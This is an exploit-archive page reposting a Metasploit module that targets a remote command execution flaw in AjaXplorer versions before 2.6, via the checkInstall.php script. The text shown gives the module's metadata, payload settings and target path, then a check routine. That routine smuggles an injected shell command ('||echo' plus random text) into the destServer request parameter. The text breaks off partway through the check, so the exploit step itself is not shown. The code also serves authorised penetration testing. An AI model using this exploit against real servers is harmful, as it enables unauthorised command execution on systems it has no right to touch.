AjaXplorer checkInstall.php Remote Command Execution



EKU-ID: 2712 CVE: OSVDB-ID: 63552
Author: sinn3r Published: 2012-10-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AjaXplorer checkInstall.php Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary command execution vulnerability in the
				AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
				2.6 are vulnerable.
			},
			'Author'         =>
				[
					'Julien Cayssol',  #Credited according to SecurityFocus
					'David Maciejak',  #Metasploit module
					'sinn3r'           #Final touch on the Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'OSVDB', '63552' ],
					[ 'BID', '39334' ]
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 512,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby python bash telnet'
						}
				},
			'Platform'       => ['unix', 'bsd', 'linux', 'osx', 'windows'],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'AjaXplorer 2.5.5 or older', { }]],
			'DisclosureDate' => 'Apr 4 2010',
			'DefaultTarget' => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
			], self.class)
	end

	def check
		target_uri.path << '/' if target_uri.path[-1,1] != '/'
		clue = Rex::Text::rand_text_alpha(rand(5) + 5)

		res = send_request_cgi({
			'method' => 'GET',
			'uri'      => "#{target_uri.path}plugins/access.ssh/checkInstall.php",
			'vars_get' => {
				'destServer'    => "||echo #{clue}"
			}
		})

		# If the server doesn't return the default